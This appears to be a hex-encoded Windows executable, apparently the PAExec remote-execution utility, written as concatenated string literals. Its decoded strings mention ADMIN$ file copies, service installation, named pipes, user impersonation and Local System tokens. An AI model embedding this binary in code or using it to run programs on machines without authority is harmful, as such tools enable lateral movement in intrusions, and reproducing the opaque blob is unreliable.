'2d004c00610074006e0000000000650075002d004500530000006d006b002' \ 'd004d004b00000074006e002d005a0041000000780068002d005a00410000' \ '007a0075002d005a0041000000610066002d005a00410000006b0061002d0' \ '047004500000066006f002d0046004f000000680069002d0049004e000000' \ '6d0074002d004d0054000000730065002d004e004f0000006d0073002d004' \ 'd00590000006b006b002d004b005a0000006b0079002d004b004700000073' \ '0077002d004b004500000075007a002d0055005a002d004c00610074006e0' \ '000000000740074002d0052005500000062006e002d0049004e0000007000' \ '61002d0049004e000000670075002d0049004e000000740061002d0049004' \ 'e000000740065002d0049004e0000006b006e002d0049004e0000006d006c' \ '002d0049004e0000006d0072002d0049004e000000730061002d0049004e0' \ '000006d006e002d004d004e000000630079002d0047004200000067006c00' \ '2d004500530000006b006f006b002d0049004e00000000007300790072002' \ 'd0053005900000000006400690076002d004d00560000000000710075007a' \ '002d0042004f00000000006e0073002d005a00410000006d0069002d004e0' \ '05a000000610072002d00490051000000640065002d004300480000006500' \ '6e002d00470042000000650073002d004d0058000000660072002d0042004' \ '5000000690074002d004300480000006e006c002d004200450000006e006e' \ '002d004e004f000000700074002d00500054000000730072002d005300500' \ '02d004c00610074006e0000000000730076002d0046004900000061007a00' \ '2d0041005a002d004300790072006c0000000000730065002d00530045000' \ '0006d0073002d0042004e00000075007a002d0055005a002d004300790072' \ '006c0000000000710075007a002d004500430000000000610072002d00450' \ '0470000007a0068002d0048004b000000640065002d004100540000006500' \ '6e002d00410055000000650073002d00450053000000660072002d0043004' \ '1000000730072002d00530050002d004300790072006c0000000000730065' \ '002d00460049000000710075007a002d005000450000000000610072002d0' \ '04c00590000007a0068002d00530047000000640065002d004c0055000000' \ '65006e002d00430041000000650073002d00470054000000660072002d004' \ '30048000000680072002d0042004100000073006d006a002d004e004f0000' \ '000000610072002d0044005a0000007a0068002d004d004f0000006400650' \ '02d004c004900000065006e002d004e005a000000650073002d0043005200' \ '0000660072002d004c0055000000620073002d00420041002d004c0061007' \ '4006e000000000073006d006a002d005300450000000000610072002d004d' \ '004100000065006e002d00490045000000650073002d00500041000000660' \ '072002d004d0043000000730072002d00420041002d004c00610074006e00' \ '0000000073006d0061002d004e004f0000000000610072002d0054004e000' \ '00065006e002d005a0041000000650073002d0044004f000000730072002d' \ '00420041002d004300790072006c000000000073006d0061002d005300450' \ '000000000610072002d004f004d00000065006e002d004a004d0000006500' \ '73002d0056004500000073006d0073002d004600490000000000610072002' \ 'd0059004500000065006e002d00430042000000650073002d0043004f0000' \ '0073006d006e002d004600490000000000610072002d00530059000000650' \ '06e002d0042005a000000650073002d00500045000000610072002d004a00' \ '4f00000065006e002d00540054000000650073002d0041005200000061007' \ '2002d004c004200000065006e002d005a0057000000650073002d00450043' \ '000000610072002d004b005700000065006e002d005000480000006500730' \ '02d0043004c000000610072002d00410045000000650073002d0055005900' \ '0000610072002d00420048000000650073002d00500059000000610072002' \ 'd00510041000000650073002d0042004f000000650073002d005300560000' \ '00650073002d0048004e000000650073002d004e0049000000650073002d0' \ '05000520000007a0068002d00430048005400000000007300720000000000' \ '610066002d007a0061000000610072002d00610065000000610072002d006' \ '20068000000610072002d0064007a000000610072002d0065006700000061' \ '0072002d00690071000000610072002d006a006f000000610072002d006b0' \ '077000000610072002d006c0062000000610072002d006c00790000006100' \ '72002d006d0061000000610072002d006f006d000000610072002d0071006' \ '1000000610072002d00730061000000610072002d00730079000000610072' \ '002d0074006e000000610072002d0079006500000061007a002d0061007a0' \ '02d006300790072006c000000000061007a002d0061007a002d006c006100' \ '74006e0000000000620065002d00620079000000620067002d00620067000' \ '00062006e002d0069006e000000620073002d00620061002d006c00610074' \ '006e0000000000630061002d00650073000000630073002d0063007a00000' \ '0630079002d00670062000000640061002d0064006b000000640065002d00' \ '610074000000640065002d00630068000000640065002d006400650000006' \ '40065002d006c0069000000640065002d006c00750000006400690076002d' \ '006d0076000000000065006c002d0067007200000065006e002d006100750' \ '0000065006e002d0062007a00000065006e002d0063006100000065006e00' \ '2d0063006200000065006e002d0067006200000065006e002d00690065000' \ '00065006e002d006a006d00000065006e002d006e007a00000065006e002d' \ '0070006800000065006e002d0074007400000065006e002d0075007300000' \ '065006e002d007a006100000065006e002d007a0077000000650073002d00' \ '610072000000650073002d0062006f000000650073002d0063006c0000006' \ '50073002d0063006f000000650073002d00630072000000650073002d0064' \ '006f000000650073002d00650063000000650073002d00650073000000650' \ '073002d00670074000000650073002d0068006e000000650073002d006d00' \ '78000000650073002d006e0069000000650073002d0070006100000065007' \ '3002d00700065000000650073002d00700072000000650073002d00700079' \ '000000650073002d00730076000000650073002d007500790000006500730' \ '02d00760065000000650074002d00650065000000650075002d0065007300' \ '0000660061002d00690072000000660069002d0066006900000066006f002' \ 'd0066006f000000660072002d00620065000000660072002d006300610000' \ '00660072002d00630068000000660072002d00660072000000660072002d0' \ '06c0075000000660072002d006d006300000067006c002d00650073000000' \ '670075002d0069006e000000680065002d0069006c000000680069002d006' \ '9006e000000680072002d00620061000000680072002d0068007200000068' \ '0075002d00680075000000680079002d0061006d000000690064002d00690' \ '064000000690073002d00690073000000690074002d006300680000006900' \ '74002d006900740000006a0061002d006a00700000006b0061002d0067006' \ '50000006b006b002d006b007a0000006b006e002d0069006e0000006b006f' \ '006b002d0069006e00000000006b006f002d006b00720000006b0079002d0' \ '06b00670000006c0074002d006c00740000006c0076002d006c0076000000' \ '6d0069002d006e007a0000006d006b002d006d006b0000006d006c002d006' \ '9006e0000006d006e002d006d006e0000006d0072002d0069006e0000006d' \ '0073002d0062006e0000006d0073002d006d00790000006d0074002d006d0' \ '0740000006e0062002d006e006f0000006e006c002d006200650000006e00' \ '6c002d006e006c0000006e006e002d006e006f0000006e0073002d007a006' \ '1000000700061002d0069006e00000070006c002d0070006c000000700074' \ '002d00620072000000700074002d00700074000000710075007a002d00620' \ '06f0000000000710075007a002d006500630000000000710075007a002d00' \ '700065000000000072006f002d0072006f000000720075002d00720075000' \ '000730061002d0069006e000000730065002d00660069000000730065002d' \ '006e006f000000730065002d0073006500000073006b002d0073006b00000' \ '073006c002d0073006900000073006d0061002d006e006f00000000007300' \ '6d0061002d00730065000000000073006d006a002d006e006f00000000007' \ '3006d006a002d00730065000000000073006d006e002d0066006900000000' \ '0073006d0073002d006600690000000000730071002d0061006c000000730' \ '072002d00620061002d006300790072006c0000000000730072002d006200' \ '61002d006c00610074006e0000000000730072002d00730070002d0063007' \ '90072006c0000000000730072002d00730070002d006c00610074006e0000' \ '000000730076002d00660069000000730076002d007300650000007300770' \ '02d006b00650000007300790072002d007300790000000000740061002d00' \ '69006e000000740065002d0069006e000000740068002d007400680000007' \ '4006e002d007a0061000000740072002d00740072000000740074002d0072' \ '007500000075006b002d00750061000000750072002d0070006b000000750' \ '07a002d0075007a002d006300790072006c000000000075007a002d007500' \ '7a002d006c00610074006e0000000000760069002d0076006e00000078006' \ '8002d007a00610000007a0068002d00630068007300000000007a0068002d' \ '00630068007400000000007a0068002d0063006e0000007a0068002d00680' \ '06b0000007a0068002d006d006f0000007a0068002d007300670000007a00' \ '68002d007400770000007a0075002d007a006100000041000000170000000' \ '0000000068080868081800000100386808682801405054545458585850500' \ '0030308050808800080028273850578000070037303050508800000020288' \ '0888080000000606860686868080807787070777070080800000800080007' \ '080000005500530045005200330032002e0044004c004c00000000004d657' \ '373616765426f78570047657441637469766557696e646f77004765744c61' \ '7374416374697665506f7075700000476574557365724f626a656374496e6' \ '66f726d6174696f6e5700000047657450726f6365737357696e646f775374' \ '6174696f6e0043004f004e004f0055005400240000006d61702f7365743c5' \ '43e20746f6f206c6f6e67008c2842004410400020003a003d000000220000' \ '002d002f0000000000efbbbf005c005c002e005c0070006900700065005c0' \ '05000410045007800650063004f0075007400250073002500750000000000' \ '0000000050004100450078006500630020006600610069006c00650064002' \ '00074006f0020006300720065006100740065002000700069007000650020' \ '00250073002e00000000005c005c002e005c0070006900700065005c00500' \ '0410045007800650063004500720072002500730025007500000000005c00' \ '5c002e005c0070006900700065005c0050004100450078006500630049006' \ 'e00250073002500750000004500720072006f007200200063007200650061' \ '00740069006e00670020007200650064006900720065006300740069006f0' \ '06e0020007000690070006500730000000000000000004400450042005500' \ '47003a00200043006c00690065006e007400200063006f006e006e0065006' \ '300740065006400200074006f00200070006900700065000000257300005c' \ '005c00250073005c0070006900700065005c0050004100450078006500630' \ '04f0075007400250073002500750000005c005c00250073005c0070006900' \ '700065005c005000410045007800650063004500720072002500730025007' \ '50000005c005c00250073005c0070006900700065005c0050004100450078' \ '006500630049006e002500730025007500000000004600610069006c00650' \ '06400200074006f0020006f00700065006e002000720065006d006f007400' \ '65002000700069007000650073000000766563746f723c543e20746f6f206' \ 'c6f6e670000696e76616c696420737472696e6720706f736974696f6e0073' \ '7472696e6720746f6f206c6f6e6700496e746572616374697665536573736' \ '96f6e2e63707000005500730069006e006700200053006500730073006900' \ '6f006e00490044002000250075002000280069006e0074006500720061006' \ '30074006900760065002000730065007300730069006f006e002900000000' \ '005500730069006e0067002000530065007300730069006f006e004900440' \ '02000250075002000660072006f006d00200070006100720061006d007300' \ '0000000053006500540063006200500072006900760069006c00650067006' \ '50000000000000000004600610069006c0065006400200074006f00200073' \ '0065007400200069006e00740065007200610063007400690076006500200' \ '074006f006b0065006e0000004b00650072006e0065006c00330032002e00' \ '64006c006c0000000000575453476574416374697665436f6e736f6c65536' \ '57373696f6e49640000000000000000570054005300470065007400410063' \ '00740069007600650043006f006e0073006f006c006500530065007300730' \ '069006f006e004900640020006e006f007400200073007500700070006f00' \ '720074006500640020006f006e002000740068006900730020004f0053000' \ '0007300650072007600690063006500000064006200670000006c006f0000' \ '0000002d006c006f0020006d0069007300730069006e00670020007600610' \ '06c007500650000002e000000000000005000410045007800650063002000' \ '740069006d006500640020006f00750074002000770061006900740069006' \ 'e006700200066006f0072002000610070007000200074006f002000650078' \ '006900740020002d002d0020007400650072006d0069006e0061007400690' \ '06e0067002000610070007000000050004100450078006500630020006500' \ '720072006f0072002000770061006900740069006e006700200066006f007' \ '2002000610070007000200074006f00200065007800690074000000000025' \ '0073002000730074006100720074006500640020007700690074006800200' \ '0700072006f00630065007300730020004900440020002500750000007b00' \ '6c006f00630061006c0020007300650072007600650072007d00000000000' \ 'd000a0043006f006e006e0065006300740069006e006700200074006f0020' \ '00250073002e002e002e000000000000005300740061007200740069006e0' \ '0670020005000410045007800650063002000730065007200760069006300' \ '650020006f006e002000250073002e002e002e000000000043006f0070007' \ '90069006e0067002000250073002000720065006d006f00740065006c0079' \ '002e002e002e000000000043006f007000790069006e00670020002500750' \ '02000660069006c00650073002000720065006d006f00740065006c007900' \ '2e002e002e0000000000410044004d0049004e00240000000000490050004' \ '300240000000000000000000d000a00500041004500780065006300200072' \ '0065007400750072006e0069006e006700200065007800690074002000630' \ '06f00640065002000250064000d000a0000007600250075002e0025007500' \ '00000000000000000d000a005000410045007800650063002000250073002' \ '0002d00200045007800650063007500740065002000500072006f00670072' \ '0061006d0073002000520065006d006f00740065006c0079000d000a00430' \ '06f0070007900720069006700680074002000280063002900200032003000' \ '310032002d003200300031003300200050006f00770065007200200041006' \ '4006d0069006e0020004c004c0043000d000a007700770077002e0070006f' \ '00770065007200610064006d0069006e002e0063006f006d002f005000410' \ '045007800650063000d000a0000005400450058005400000000000d0a0000' \ '000000004500720072006f0072002000670065007400740069006e0067002' \ '000660069006c006500200069006e0066006f002000660072006f006d0020' \ '00250073002e00000000005e43202873746f7070696e67290d0a005400690' \ '06d0065006f0075007400200063006f006e006e0065006300740069006e00' \ '6700200074006f002000250073002e002e002e000000d4284200d64e40005' \ 'c000000000000002f00610063006300650070007400650075006c00610000' \ '002d00610063006300650070007400650075006c00610000005c005c002a0' \ '000004e006f00200063006f006d0070007500740065007200730020006300' \ '6f0075006c006400200062006500200066006f0075006e00640000000d000' \ 'a000000000043006f006d007000750074006500720020006c006900730074' \ '002000660069006c006500200065006d00700074007900000000005c005c0' \ '0000000002c00000043006f006d007000750074006500720020006e006f00' \ '7400200073007000650063006900660069006500640000000000750000007' \ '0000000700040000000000070004000640000006e0000006c000000680000' \ '00730000006500000078000000690000006300000063006e006f006400650' \ '06c0000000000660000007600000077000000640000006c006f0077000000' \ '620065006c006f0077006e006f0072006d0061006c000000610062006f007' \ '60065006e006f0072006d0061006c00000068006900670068000000000072' \ '00650061006c00740069006d006500000000006200610063006b006700720' \ '06f0075006e00640000000000610000006300730072006300000000006300' \ '6c006900730074000000640066007200000072006c006f00000074006f000' \ '00000006e006f006e0061006d006500000000006100630063006500700074' \ '00650075006c0061000000000052006500610063006800650064002000650' \ '06e00640020006f006600200063006f006d006d0061006e00640020006200' \ '650066006f0072006500200073006500650069006e0067002000650078007' \ '0006500630074006500640020007000610072007400730000002500730020' \ '006900730020006e006f0074002000610020007200650063006f0067006e0' \ '069007a006500640020006f007000740069006f006e0000002f003f000000' \ '00002d003f0000000000000000002d0061002000730070006500630069006' \ '600690065006400200077006900740068006f007500740020006e006f006e' \ '002d007a00650072006f002000760061006c0075006500730000000000430' \ '061006e0027007400200075007300650020002d006800200061006e006400' \ '20002d006c00200074006f006700650074006800650072000000000043006' \ '1006e0027007400200075007300650020002d0068002c0020002d0073002c' \ '0020006f00720020002d006c00200074006f0067006500740068006500720' \ '00000000000000000530065007400740069006e00670020002d006e002000' \ '7700680065006e0020006e006f00200063006f006d0070007500740065007' \ '2007300200073007000650063006900660069006500640000000000530065' \ '007400740069006e00670020002d006e00200074006f00200030000000220' \ '00000200000004600610069006c0065006400200074006f00200064006500' \ '6c0065007400650020007000400064002000660069006c00650000002d007' \ '500200077006900740068006f007500740020007500730065007200000050' \ '0061007300730077006f00720064003a00200000000000430061006e00270' \ '07400200075007300650020002d007300200061006e00640020002d006c00' \ '200074006f00670065007400680065007200000000002d007700200077006' \ '900740068006f00750074002000760061006c007500650000000000530070' \ '00650063006900660069006500640020002d0078002000770069007400680' \ '06f007500740020002d00730000002d006300730072006300200077006900' \ '740068006f007500740020002d006300000000002d0063007300720063002' \ '00077006900740068006f00750074002000760061006c007500650000002d' \ '006300730072006300200061006e00640020002d0063006c0069007300740' \ '0200061007200650020006e006f007400200063006f006d00700061007400' \ '690062006c00650000002d0063006c0069007300740020007700690074006' \ '8006f007500740020002d00630000002d0063006c00690073007400200077' \ '006900740068006f00750074002000760061006c0075006500000000002d0' \ '063006c006900730074002000660069006c006500200065006d0070007400' \ '790000002d0063006e006f00640065006c00200077006900740068006f007' \ '500740020002d006300000000002d0072006c006f0020006d006900730073' \ '0069006e0067002000760061006c007500650000000000000000002d00640' \ '0200061006e00640020002d0074006f002000630061006e006e006f007400' \ '20006200650020007500730065006400200074006f0067006500740068006' \ '50072000000000069006e00760061006c006900640020006f00720020006d' \ '0069007300730069006e0067002000760061006c0075006500200066006f0' \ '0720020002d0074006f00000000004e006f0020006100700070006c006900' \ '63006100740069006f006e002000730070006500630069006600690065006' \ '400000000004f006e00650020006f00720020006d006f0072006500200073' \ '006f0075007200630065002000660069006c0065007300200077006500720' \ '0650020006e006f007400200066006f0075006e0064002e00200020005400' \ '7200790020002d00630073007200630020006f00720020002d0063006c006' \ '900730074003f00000000004500720072006f00720020006400750070006c' \ '00690063006100740069006e0067002000610020007500730065007200200' \ '074006f006b0065006e0020002800250053002c0020002500640029000000' \ '5300650044006500620075006700500072006900760069006c00650067006' \ '50000000000000000004e006f0074002000610062006c006500200074006f' \ '00200067006500740020004c006f00630061006c002000530079007300740' \ '065006d00200074006f006b0065006e000000000047006f00740020004c00' \ '6f00630061006c002000530079007300740065006d002000680061006e006' \ '4006c006500000050726f636573732e637070004500720072006f00720020' \ '006c006f006700670069006e006700200069006e002000610073002000250' \ '07300000000005300650052006500730074006f0072006500500072006900' \ '760069006c0065006700650000000000530065004200610063006b0075007' \ '000500072006900760069006c0065006700650000004600610069006c0065' \ '006400200074006f00200069006d0070006500720073006f006e006100740' \ '06500200063006c00690065006e0074002000750073006500720000004900' \ '6d0070006500720073006f006e0061007400650064002000630061006c006' \ 'c00650072000000000000004600610069006c0065006400200074006f0020' \ '006f00700065006e002000630075007200720065006e00740020007500730' \ '065007200200074006f006b0065006e000000220025007300220000000000' \ '4600610069006c0065006400200074006f002000500072006500700046006' \ 'f00720049006e00740065007200610063007400690076006500500072006f' \ '0063006500730073000000570069006e0053007400610030005c004400650' \ '06600610075006c0074000000770069006e0073007400610030005c005700' \ '69006e006c006f0067006f006e00000000000000000050004100450078006' \ '500630020007300740061007200740069006e0067002000700072006f0063' \ '0065007300730020005b00250073005d0020006100730020004c006f00630' \ '061006c002000530079007300740065006d00000000004800610076006500' \ '2000620061006400200075007300650072002000680061006e0064006c006' \ '500000000005300650049006d0070006500720073006f006e006100740065' \ '00500072006900760069006c00650067006500000000004600610069006c0' \ '065006400200074006f00200069006d0070006500720073006f006e006100' \ '74006500000053006500410073007300690067006e005000720069006d006' \ '1007200790054006f006b0065006e00500072006900760069006c00650067' \ '00650000005300650049006e00630072006500610073006500510075006f0' \ '074006100500072006900760069006c006500670065000000000000000000' \ '50004100450078006500630020007300740061007200740069006e0067002' \ '000700072006f00630065007300730020005b00250073005d002000610073' \ '0020002500730000000000500041004500780065006300200073007400610' \ '07200740069006e0067002000700072006f00630065007300730020005b00' \ '250073005d002000610073002000630075007200720065006e00740020007' \ '500730065007200000000007b006e0075006c006c007d00000000007b0065' \ '006e0076007d0000007b006e006f006e002d006e0075006c006c007d00000' \ '000004c00610075006e0063006800200028006c00610075006e0063006800' \ '47004c0045003d00250075002900200070006100720061006d0073003a002' \ '00070006100740068003d005b00250073005d00200075007300650072003d' \ '005b00250073005d002c002000700045006e0076003d005b00250073005d0' \ '02c0020006400690072003d005b00250073005d002c002000730074006400' \ '69006e003d005b007800250058005d002c0020007300740064006f0075007' \ '4003d005b007800250058005d002c0020007300740064006500720072003d' \ '005b007800250058005d00000053007500630063006500730073006600750' \ '06c006c00790020006c00610075006e006300680065006400000046006100' \ '69006c0065006400200074006f00200073007400610072007400200025007' \ '3002e00000000000000480049004e0054003a002000500041004500780065' \ '0063002000700072006f006200610062006c00790020006e0065006500640' \ '07300200074006f0020006200650020002200520075006e00200041007300' \ '2000410064006d0069006e006900730074007200610074006f00720022000' \ '000000000000000430061006e0027007400200065006e0075006d00500072' \ '006f0063006500730073006500730020002d0020004600610069006c00650' \ '06400200074006f002000670065007400200074006f006b0065006e002000' \ '66006f00720020004c006f00630061006c002000530079007300740065006' \ 'd002e00000053002d0031002d0035002d0031003800000000000000000046' \ '00610069006c0065006400200074006f002000670065007400200074006f0' \ '06b0065006e00200066006f00720020004c006f00630061006c0020005300' \ '79007300740065006d002e000000610064007600610070006900330032002' \ 'e0064006c006c000000000053616665724372656174654c6576656c000000' \ '005361666572436f6d70757465546f6b656e46726f6d4c6576656c0000536' \ '1666572436c6f73654c6576656c00530061006600650072002e002e002e00' \ '2000630061006c006c00730020006e006f007400200073007500700070006' \ 'f00720074006500640020006f006e002000740068006900730020004f0053' \ '0020002d002d002000630061006e002700740020006c0069006d006900740' \ '020007200690067006800740073000000000000004600610069006c006500' \ '6400200074006f0020006c0069006d0069007400200072006900670068007' \ '400730020002800530061006600650072004300720065006100740065004c' \ '006500760065006c0029002e00000000004600610069006c0065006400200' \ '074006f0020006c0069006d00690074002000720069006700680074007300' \ '200028005300610066006500720043006f006d00700075007400650054006' \ 'f006b0065006e00460072006f006d004c006500760065006c0029002e0000' \ '0000000000000044006f006e0027007400200068006100760065002000610' \ '0200067006f006f0064002000750073006500720020002d002d0020006300' \ '61006e002700740020006c0069006d0069007400200072006900670068007' \ '4007300000000004600610069006c0065006400200074006f002000670065' \ '007400200065006c00650076006100740065006400200074006f006b00650' \ '06e0000000000430061006e00270074002000710075006500720079002000' \ '74006f006b0065006e00200074006f002000720075006e00200065006c006' \ '5007600610074006500640020002d00200063006f006e00740069006e0075' \ '0069006e006700200061006e00790077006100790000005c005c002500730' \ '05c002500730000004600610069006c0065006400200074006f0020006300' \ '6f006e006e00650063007400200074006f002000250073002e00000000002' \ 'e00650078006500000000005c005c00250073005c00410044004d0049004e' \ '0024005c0025007300000000004600610069006c0065006400200074006f0' \ '0200063006c00650061006e007500700020005b00250073005d0020006f00' \ '6e002000250073002e0000004600610069006c0065006400200074006f002' \ '00063006f007000790020005b00250073005d00200074006f0020005b0025' \ '0073005d0020002d002d00200067006f0069006e006700200074006f00200' \ '0740072007900200074006f00200063006f006e00740069006e0075006500' \ '200061006e0079007700610079002e0000005000410045007800650063000' \ '00000005000410045007800650063002d000000250075002d002500730000' \ '007b006c006f00630061006c00200063006f006d007000750074006500720' \ '07d00000000004600610069006c0065006400200074006f00200063006f00' \ '6e006e00650063007400200074006f0020005300650072007600690063006' \ '500200043006f006e00740072006f006c0020004d0061006e006100670065' \ '00720020006f006e002000250073002e0020002000430061006e002700740' \ '0200063006c00650061006e00750070002000500041004500780065006300' \ '2e00000000004600610069006c0065006400200074006f002000730074006' \ 'f007000200050004100450078006500630020007300650072007600690063' \ '0065002e00000000004600610069006c0065006400200074006f002000640' \ '065006c006500740065002000500041004500780065006300200073006500' \ '7200760069006300650000004600610069006c0065006400200074006f002' \ '00063006f006e006e00650063007400200074006f00200053006500720076' \ '00690063006500200043006f006e00740072006f006c0020004d0061006e0' \ '0610067006500720020006f006e002000250073002e000000250025005300' \ '79007300740065006d0052006f006f007400250025005c00250073002e006' \ '50078006500000020002d0073006500720076006900630065000000460061' \ '0069006c0065006400200074006f00200069006e007300740061006c006c0' \ '02000730065007200760069006300650020006f006e002000250073000000' \ '4600610069006c0065006400200074006f002000730074006100720074002' \ '000730065007200760069006300650020006f006e0020002500730000002e' \ '657865000000005c005c00250073005c0070006900700065005c002500730' \ '0000000004600610069006c0065006400200074006f0020006f0070006500' \ '6e00200063006f006d006d0075006e00690063006100740069006f006e002' \ '0006300680061006e006e0065006c00200074006f002000250073002e0000' \ '00540069006d006500640020006f007500740020007700610069007400690' \ '06e006700200066006f007200200063006f006d006d0075006e0069006300' \ '6100740069006f006e0020006300680061006e006e0065006c00200074006' \ 'f002000250073002e00000000004600610069006c0065006400200074006f' \ '002000730065007400200063006f006d006d0075006e00690063006100740' \ '069006f006e0020006300680061006e006e0065006c00200074006f002000' \ '250073002e00000000004500720072006f007200200063006f006d006d007' \ '5006e00690063006100740069006e00670020007700690074006800200025' \ '0073002e0000000000000000004500720072006f007200200072006500610' \ '0640069006e006700200072006500730070006f006e007300650020006600' \ '72006f006d002000250073002e00000052006500630065006900760065006' \ '400200074006f006f0020006c006900740074006c00650020006400610074' \ '0061002000660072006f006d002000250073002e000000250073002000720' \ '065007400750072006e006500640020002500690000000000000000005200' \ '65006d006f0074006500200061007000700020006600610069006c0065006' \ '400200074006f002000730074006100720074002e00200020005200650074' \ '00750072006e006500640020006500720072006f0072003a000d000a00200' \ '0200025007300000000005c005c00250073005c00410044004d0049004e00' \ '24005c005000410045007800650063005f004d006f0076006500250075002' \ 'e0064006100740000005c005000410045007800650063005f004d006f0076' \ '006500250075002e00640061007400000000004600610069006c006500640' \ '0200074006f00200063006f007000790020005b00250073005d0020007400' \ '6f0020005b00250073005d002e00000000004600610069006c00650064002' \ '00074006f0020006f00700065006e00200063006f006d006d002000700069' \ '00700065007300200066006f0072002000250073002e002000000000004e0' \ '06f00740020007500730069006e0067002000720065006400690072006500' \ '6300740065006400200049004f003a00200044006f006e007400570061006' \ '90074003d00250075002c00200049006e0074006500720061006300740069' \ '00760065003d0025007500000000002500730020007200650074007500720' \ '06e0065006400200025006400000000004e006f0074002000770061006900' \ '740069006e006700200066006f007200200025007300200074006f0020006' \ '50078006900740000000000740072007500650000000000660061006c0073' \ '0065000000000000002d002d002d002d002d002d002d002d002d002d002d0' \ '02d002d000d000a0055007300650072003a00200027002500730027002c00' \ '20004c006f00630061006c00530079007300740065006d003a00200025007' \ '3002c00200049006e007400650072006100630074006900760065003a0020' \ '00250073002c002000530065007300730069006f006e003a0020002500690' \ '00000000000000000530065007400740069006e0067007300200069006e00' \ '6400690063006100740065002000660069006c006500730020006d0061007' \ '90020006e00650065006400200074006f00200062006500200063006f0070' \ '0069006500640020002d002d00200063006800650063006b0069006e00670' \ '02e002e002e000000000020002000200020002e002e002e006e0065006500' \ '6400200074006f00200063006f00700079002000660069006c00650073000' \ '00020002000200020002e002e002e006e006f002000660069006c00650073' \ '0020006e00650065006400200074006f00200062006500200063006f00700' \ '0690065006400000053006f0075007200630065002000660069006c006500' \ '200064006f006500730020006e006f0074002000650078006900730074000' \ '00000004600610069006c0065006400200074006f0020006d006f00760065' \ '0020005b00250073005d00200074006f0020005b00250073005d0000004d0' \ '06f00760065006400200025007300200074006f0020002500730000000000' \ '0000000050004100450078006500630020007300650072007600690063006' \ '5002000730074006f007000700069006e006700200028006100730079006e' \ '0063002900000050004100450078006500630020007300650072007600690' \ '0630065002000730074006f007000700069006e0067000000500041004500' \ '7800650063002000720065006300650069007600650064002000720065007' \ '1007500650073007400200074006f002000730074006f0070002c00200062' \ '007500740020007300740069006c006c00200068006100760065002000610' \ '0630074006900760065002000720065007100750065007300740073002e00' \ '20002000570069006c006c002000730074006f00700020006c00610074006' \ '50072002e00000000004500720072006f0072002000720065006100640069' \ '006e006700200072006500710075006500730074002000660072006f006d0' \ '02000700069007000650020002d002d002000730074006f00700070006900' \ '6e00670020007300650072007600690063006500000052006500630065006' \ '900760065006400200074006f006f0020006c006900740074006c00650020' \ '006400610074006100200069006e002000720065007100750065007300740' \ '020002d002d002000730074006f007000700069006e006700200073006500' \ '7200760069006300650000004500720072006f0072002000730065006e006' \ '40069006e0067002000640061007400610020006200610063006b0020002d' \ '002d002000730074006f007000700069006e0067002000730065007200760' \ '06900630065002e0000000000500041004500780065006300200053006500' \ '720076006900630065004d00610069006e002000730074006100720074006' \ '9006e0067002e000000000052006500670069007300740065007200530065' \ '00720076006900630065004300740072006c00480061006e0064006c00650' \ '0720020006600610069006c0065006400200069006e002000500041004500' \ '78006500630000004600610069006c0065006400200074006f00200073006' \ '90067006e0061006c0020005000410045007800650063002000720075006e' \ '006e0069006e0067002e00000000005000410045007800650063002000730' \ '06500720076006900630065002000720075006e006e0069006e0067002e00' \ '00005c005c002e005c0070006900700065005c00250073000000500041004' \ '5007800650063002000630072006500610074006500640020007000690070' \ '0065002000250073002e00000050004100450078006500630020006500780' \ '06900740069006e00670020006c006f006f0070002e000000000050004100' \ '450078006500630020006600610069006c0065006400200074006f0020007' \ '3007400610072007400200053006500720076006900630065004300740072' \ '006c0044006900730070006100740063006800650072002e0000005300650' \ '0720076006900630065007300410063007400690076006500000000006765' \ '6e6572696300756e6b6e6f776e206572726f72000000696f73747265616d0' \ '0000000696f73747265616d2073747265616d206572726f72000000737973' \ '74656d000053005400520049004e004700200054004f004f0020004c004f0' \ '04e0047003a0020002500730000003c006500720072006f00720020002d00' \ '200073007400720069006e006700200074006f006f0020006c006f006e006' \ '70020002d002d002000000000003e0000003c0073007400720069006e0067' \ '00200066006f0072006d00610074002000650078006300650070007400690' \ '06f006e003a0020005b00000028006e0075006c006c002900000000005d00' \ '3e000000000055006e006b006e006f0077006e0020006500720072006f007' \ '2002000760061006c00750065002e00200000000d0000000a00000020005b' \ '004500720072003d00300078002500300058002c002000250075005d00000' \ '000004600610069006c0065006400200074006f0020006f00700065006e00' \ '2000700072006f006300650073007300200074006f00200065006e0061006' \ '2006c0065002000700072006900760069006c006500670065002000250073' \ '00000043006f0075006c00640020006e006f0074002000660069006e00640' \ '02000700072006900760069006c0065006700650020002500730000000000' \ '00004600610069006c0065006400200074006f002000610064006a0075007' \ '3007400200074006f006b0065006e00200066006f00720020007000720069' \ '00760069006c006500670065002000250073000000576f773634446973616' \ '26c65576f77363446735265646972656374696f6e0000576f773634526576' \ '657274576f77363446735265646972656374696f6e0000004400690073006' \ '10062006c0065006400200057004f005700360034002000660069006c0065' \ '002000730079007300740065006d002000720065006400690072006500630' \ '0740069006f006e00000000004600610069006c0065006400200074006f00' \ '2000640069007300610062006c006500200057004f0057003600340020006' \ '60069006c0065002000730079007300740065006d00200072006500640069' \ '00720065006300740069006f006e0000004600610069006c0065006400200' \ '074006f002000660069006e006400200057006f0077003600340044006900' \ '7300610062006c00650057006f00770036003400460073005200650064006' \ '900720065006300740069006f006e00200041005000490000000000000046' \ '00610069006c0065006400200074006f0020007400720061006e0073006c0' \ '061007400650020005500540046002d0038002000660069006c0065002000' \ '25007300200069006e0074006f00200055006e00690063006f00640065002' \ 'e0000004600610069006c0065006400200074006f0020006f00700065006e' \ '00200074006500780074002000660069006c0065002000250073002e00000' \ '0000000000000480000000000000000000000000000000000000000000000' \ '0000000000000000000000000000000000000000000000000000000000000' \ '0000000000060634200202a42003c0000005253445398fceeda9ecc634abe' \ '9a3cedd7daad0d01000000443a5c4465762d4769745c50726f6a5c5041457' \ '865635c52656c656173655c5041457865632e70646200000000000000aa00' \ '0000aa00000000000000386042000000000000000000ffffffff000000004' \ '0000000602642000000000000000000010000007026420044264200000000' \ '000000000000000000000000001c6042008c2642000000000000000000020' \ '000009c264200a826420044264200000000001c6042000100000000000000' \ 'ffffffff00000000400000008c26420000000000000000000000000054604' \ '200d8264200000000000000000002000000e8264200f42642004426420000' \ '000000546042000100000000000000ffffffff0000000040000000d826420' \ '0000000000000000000000000746042002427420000000000000000000300' \ '00003427420044274200f4264200442642000000000074604200020000000' \ '0000000ffffffff0000000040000000242742000000000000000000000000' \ '0094604200742742000000000000000000030000008427420094274200f42' \ '642004426420000000000946042000200000000000000ffffffff00000000' \ '4000000074274200000000000000000000000000b4604200c427420000000' \ '0000000000001000000d4274200dc27420000000000b46042000000000000' \ '000000ffffffff0000000040000000c427420000000000000000000000000' \ '03860420060264200000000000000000000000000d06d4200202842000000' \ 